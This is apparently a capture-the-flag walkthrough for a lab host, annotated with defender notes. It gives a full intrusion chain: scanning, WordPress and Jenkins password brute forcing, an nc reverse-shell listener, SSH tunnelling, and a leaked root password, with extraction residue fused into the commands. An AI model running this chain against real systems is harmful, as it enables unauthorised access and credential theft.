# Walkthrough transcript for the "internal.thm" lab host, kept as the sequence of
# manually-run commands it was written as. It is NOT one runnable script: different
# lines are executed on the attacker host, inside the www-data reverse shell, in the
# aubreanna session, and in the Jenkins console, with manual UI steps in between.
# The leading digits on each line are fused page gutter numbers, and the
# `606070;">` / `#a5d6ff;">` fragments are syntax-highlighter residue from the page
# extraction, not shell syntax; both are left as found.
# Reviewer notes below take the defender's view of each step: what the step depends
# on, what a host or network owner would see in logs, and which control removes it.
1606070;"># Step 1: Add hosts entry
# TARGET_IP is a placeholder for the lab address. Appending to /etc/hosts needs root
# on the attacker machine.
2echo 606070;">#a5d6ff;">"TARGET_IP internal.thm" >> /etc/hosts
3
4606070;"># Step 2: Enumeration
# Service/version scan. From the target's side this is the noisiest step of the chain:
# one source probing many ports with version banners is straightforward to alert on.
5nmap -sV internal.thm
6606070;"># 22 SSH, 80 HTTP
7
# Directory brute force against the web root; shows up as a burst of 404 responses
# from a single client in the web server access log. A publicly reachable /phpmyadmin
# is a finding in its own right, independent of the rest of the chain.
8gobuster dir -u http:606070;">//internal.thm -w /usr/share/wordlists/dirb/common.txt
9606070;"># Found: /blog (WordPress), /phpmyadmin
10
11606070;"># Step 3: WordPress Exploitation
# Username enumeration; it only works because the site reveals valid account names to
# unauthenticated clients. Mitigation: suppress username disclosure and rate-limit the
# login endpoint.
12wpscan --url http:606070;">//internal.thm/blog --enumerate u
13606070;"># Found: admin
14
# Online password guessing against the WordPress login with rockyou.txt. This succeeds
# only because the admin account uses a wordlist password and there is no lockout or
# rate limit; many failed logins from one IP in a short window is the detection signal.
15wpscan --url http:606070;">//internal.thm/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt
16606070;"># Credentials found!
17
# Manual step in the WordPress admin UI. It relies on the built-in theme editor being
# available to the admin account; setting DISALLOW_FILE_EDIT in wp-config.php removes
# this path entirely, and theme files are a good file-integrity-monitoring target.
18606070;"># Login, edit theme 404.php with reverse shell
19
20606070;"># Step 4: Initial Shell
# Listener on the attacker host; 4444 is presumably the port the shell placed in
# 404.php connects back to (its contents are not shown here).
21nc -lvnp 4444
# An outbound connection from the web server process to an unusual port is the egress
# signal a defender would alert on.
22606070;"># Trigger 404.php - shell as www-data
23
24606070;"># Step 5: Internal Enumeration
# Plaintext credentials in a file under /opt that the web-server account can read.
# Root cause: a secret stored on disk outside the application's config with no
# permission restriction.
25cat /opt/wp-save.txt
26606070;"># Found: aubreanna credentials!
27
# Lateral move to a user account with the recovered password. The same password also
# works over SSH (next comment), i.e. it is reused across services.
28su aubreanna
29606070;"># or SSH
30cat /home/aubreanna/user.txt
31
# A second plaintext notes file in the user's home; it points at a service that is not
# reachable from outside the host.
32cat /home/aubreanna/jenkins.txt
33606070;"># Jenkins on 172.17.0.2:8080 (internal Docker!)
34
35606070;"># Step 6: SSH Tunneling
36606070;"># On your machine:
# Local port forward: attacker's localhost:8080 -> 172.17.0.2:8080 through the
# aubreanna SSH session. The Docker network's isolation is bypassed using the
# compromised user's own SSH access; sshd's AllowTcpForwarding (or per-user forwarding
# restrictions) is the control, and forwarded connections are loggable.
37ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
38
39606070;"># Access http://localhost:8080 (Jenkins!)
40
41606070;"># Step 7: Jenkins Exploitation
42606070;"># Brute force Jenkins login
# Online guessing against Jenkins' form login (/j_acegi_security_check); "Invalid" is
# the failure marker hydra matches on. Same defensive signal as step 3: many failed
# POSTs from one client. The username is again assumed to be admin.
43hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8080 http-post-form 606070;">#a5d6ff;">"/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid"
44
45606070;"># Login to Jenkins
46606070;"># Manage Jenkins > Script Console
# The Script Console runs arbitrary Groovy with the Jenkins service's OS privileges, so
# any account that can reach it effectively has code execution on the Jenkins host.
# Restrict it to administrators and keep Jenkins off networks that untrusted users
# can reach, even indirectly through a tunnel as here.
47606070;"># Groovy reverse shell
48
49606070;"># Step 8: Root Access
# Third plaintext credential file in this chain; a root password left in a note is the
# final root cause.
50606070;"># Jenkins shell reveals root credentials in /opt/note.txt
51cat /opt/note.txt
52606070;"># root:tr0ub13guM!@#123
53
# Direct root login over SSH with a password; PermitRootLogin no (or key-only auth)
# would block this step regardless of the leaked password.
54ssh root@internal.thm